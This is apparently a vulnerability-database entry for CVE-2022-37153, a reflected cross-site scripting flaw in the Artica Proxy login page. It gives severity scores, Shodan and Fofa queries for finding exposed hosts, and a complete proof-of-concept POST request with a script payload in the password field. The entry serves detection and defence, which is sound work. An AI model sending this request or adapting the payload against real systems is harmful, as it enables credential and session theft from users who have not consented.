🔙 목록으로 돌아가기

CVE-2022-37153: Artica Proxy 4.30.000000 - Cross-Site Scripting

TitleArtica Proxy 4.30.000000 - Cross-Site Scripting
Authorarafatansari
SeverityMedium
ImpactAttackers can inject malicious JavaScript through the password parameter in the Artica Proxy login page that reflects back to users, potentially stealing credentials or session tokens when victims submit the login form.
RemediationUpgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability.
CVSS Score6.1
EPSS Score0.03431
CVE IDCVE-2022-37153
CWE IDCWE-79
Shodan Queryhttp.html:"Artica"http.html:"artica"
Fofa Querybody="artica"
Tags cve cve2022 xss artica articatech vkev vuln

🔍 Vulnerability Description

Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.

🌐 HTTP Request

POST /fw.login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10
Connection: close
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-37153.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-37153.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A